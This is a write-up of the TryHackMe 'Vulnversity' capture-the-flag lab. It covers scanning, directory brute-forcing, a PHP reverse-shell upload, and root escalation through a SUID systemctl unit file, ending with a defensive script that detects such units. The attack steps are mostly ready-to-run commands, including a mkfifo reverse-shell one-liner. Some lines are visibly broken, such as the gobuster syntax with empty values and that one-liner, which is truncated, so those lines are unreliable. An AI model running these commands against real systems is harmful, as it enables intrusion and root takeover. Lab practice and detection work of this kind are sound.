====== TRY HACK ME ======

  * [[https://tryhackme.com/ | TryHackMe]]: Cyber security training through short, gamified, real-world labs. Content for complete beginners and seasoned hackers.

====== Vulnversity ======

Write-Ups: [[https://n0w4n.nl/vulnversity/ | n0w4n]]

===== Port/Version Scan =====

Mine:
<code bash>
nmap -vv -p- -sV -A [IP]
</code>

[[https://n0w4n.nl/vulnversity/ | n0w4n's]]:
<code bash>
nmap -n -T4 -sS -sV -sC -oN nmap/portscan -p- 10.10.207.138
</code>

===== GoBuster (dirs) =====

Brute-force directories & files, DNS subdomains, and virtual host names.

<code bash>
apt-get install gobuster
</code>

Wordlists are under ''/usr/share/wordlists''.

Syntax:
<code bash>
gobuster dir -u http://:3333 -w -e
</code>

  * ''-e'' Print the full URLs in your console
  * ''-u'' The target URL
  * ''-w'' Path to your wordlist
  * ''-U'' and ''-P'' Username and Password for Basic Auth
  * ''-p'' Proxy to use for requests
  * ''-c'' Specify a cookie for simulating your auth

[[https://n0w4n.nl/vulnversity/ | n0w4n]]: Used DirSearch
<code bash>
dirsearch -u http://10.10.207.138:3333 -e php -x 400,404
</code>

===== Burp: Intruder =====

**Burp Suite Intruder:** Fuzz the ''/internal/'' directory to see what kinds of file extensions it will allow you to upload.

[[https://n0w4n.nl/vulnversity/ | n0w4n]]: Load the wordlist and don’t forget to disable the encode options. If you forget this, you will not have the proper result as your filename will be ''file%2ephp'', which won’t work.

  * I did that... and it didn't work.

===== Reverse Shell =====

Obtain an exploit reverse shell to upload: [[https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php | pentestmonkey]]

  * You have to rename it ''.phtml'' to upload it.
  * Upload it.
  * Start a listener on your attack machine:
<code bash>
nc -lvnp 1234
# -l listener
# -v verbose
# -n numeric-only IPs, no DNS
# -p port (local port number)
</code>
  * Then execute the ''.phtml'' file on the target machine: ''http://[IP]:3333/internal/uploads''

===== Privilege Escalation =====

[[https://n0w4n.nl/vulnversity/ | n0w4n]]: For a lot of CTFs, a good find is files with the SUID bit set.
<code bash>
find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null
# -l long listing format
# -d list directory names, not contents
</code>

**Or use PEASS:** [[https://pentesttools.net/peass-privilege-escalation-awesome-scripts-suite/ | Privilege Escalation Awesome Scripts Suite]]

  * [[https://github.com/carlospolop/PEASS-ng/releases/tag/20220918 | Download]]
  * [[https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS | Linpeas]]: Linux local Privilege Escalation Awesome Script (.sh)

**Discovered Vulnerability:** [[https://gtfobins.github.io/gtfobins/systemctl/ | systemctl is SUID root]]

===== Exploit =====

[[https://n0w4n.nl/vulnversity/ | n0w4n]]: He said we did not have perms to write in the default systemctl dir, so he created the unit file under ''/tmp'' (via ''mktemp'') and kept its path in a shell variable.

  * First we create a variable which holds a unique file name (on the target machine):
<code bash>
eop=$(mktemp).service
</code>
  * Then we write a unit file into that path. Inside the unit file we enter a command that lets the shell execute ''cat'' and redirect the output of ''cat'' to a file called ''output'' in the folder ''/tmp/'':
<code bash>
echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $eop
</code>
  * And finally we use the ''/bin/systemctl'' program to link and enable the unit file:
<code bash>
/bin/systemctl link $eop
# Created symlink from /etc/systemd/system/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service.
/bin/systemctl enable --now $eop
# Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service.
</code>
  * Find it:
<code bash>
ls -lah /tmp
</code>

===== Alternative Exploit =====

**To get a reverse root shell:**

**NOTE:** the target machine is using netcat OpenBSD, NOT the traditional netcat. That means the ''-e'' (execute) flag will not work. See **Netcat (Traditional)** and **Netcat (OpenBSD)** (OpenBSD netcat removed the ''-e'' flag “for security”, see [[https://kb.systemoverlord.com/security/postex/reverse/ | link]]).
<code bash>
# nc (openbsd):
rm /tmp/f;mkfifo /tmp/f;/bin/sh -i 2>&1 /tmp/f
</code>

  * Create your unit file:
<code bash>
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;/bin/sh -i 2>&1 /tmp/f"
[Install]
WantedBy=multi-user.target' > gk.service
</code>
  * Open a listener on your attack machine:
<code bash>
nc -lvnp 7777
</code>
  * Link and start the service:
<code bash>
/bin/systemctl link /tmp/gk.service # need the full path
/bin/systemctl enable --now /tmp/gk.service
</code>

Done.

----
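Both the Exploit and the Alternative Exploit leave the same trace on the box: a symlink in ''/etc/systemd/system'' (plus a second one in ''multi-user.target.wants/'') that resolves to a unit file in ''/tmp''. The following audit script is an added example, not code from this write-up or from n0w4n's post; the ''SUSPICIOUS_PREFIXES'' list and the ''demo()'' fixture are my own assumptions, and the unit name it rebuilds is the one shown in the ''systemctl'' output above.

```python
"""Audit a systemd unit directory for units whose real file lives in a
user-writable tree: the trace that `systemctl link /tmp/x.service` and
`systemctl enable --now` leave behind in /etc/systemd/system."""
import os
import tempfile
from pathlib import Path

# Assumption: no legitimate unit file should resolve into one of these trees.
SUSPICIOUS_PREFIXES = ("/tmp", "/var/tmp", "/dev/shm", "/home")

def _under(target: str, prefixes) -> bool:
    """True if `target` equals or sits below any directory in `prefixes`."""
    return any(target == p or target.startswith(p.rstrip("/") + "/") for p in prefixes)

def find_linked_units(unit_dir="/etc/systemd/system", prefixes=SUSPICIOUS_PREFIXES):
    """Sorted (symlink, resolved_target) pairs for every symlinked unit under
    `unit_dir` whose real file is in a suspicious tree; *.wants/ dirs are walked too."""
    hits = []
    for root, _dirs, files in os.walk(unit_dir):   # symlinks to files show up in `files`
        for name in files:
            link = Path(root) / name
            if not link.is_symlink():
                continue                             # regular unit files are out of scope here
            target = os.path.realpath(link)
            if _under(target, prefixes):
                hits.append((str(link), target))
    return sorted(hits)

def demo():
    """Rebuild the write-up's artefact in a throwaway directory (constructed
    sample data, not a real host) and return what the audit reports."""
    base = Path(tempfile.mkdtemp()).resolve()       # resolve() so realpath() prefixes match
    fake_tmp = base / "tmp"
    sys_dir = base / "etc" / "systemd" / "system"
    wants = sys_dir / "multi-user.target.wants"
    wants.mkdir(parents=True)
    fake_tmp.mkdir()
    unit = fake_tmp / "tmp.x1uzp01alO.service"       # name taken from the write-up's output
    unit.write_text("[Service]\nExecStart=/bin/true\n")
    (sys_dir / unit.name).symlink_to(unit)          # what `systemctl link` created
    (wants / unit.name).symlink_to(unit)            # what `systemctl enable` added
    (sys_dir / "legit.service").write_text("[Service]\n")   # must not be flagged
    return find_linked_units(str(sys_dir), prefixes=(str(fake_tmp),))

if __name__ == "__main__":
    for link, target in find_linked_units():
        print(f"{link} -> {target}")
```

Run without arguments on a host it walks the real ''/etc/systemd/system''; ''demo()'' shows the two hits the write-up's steps would produce.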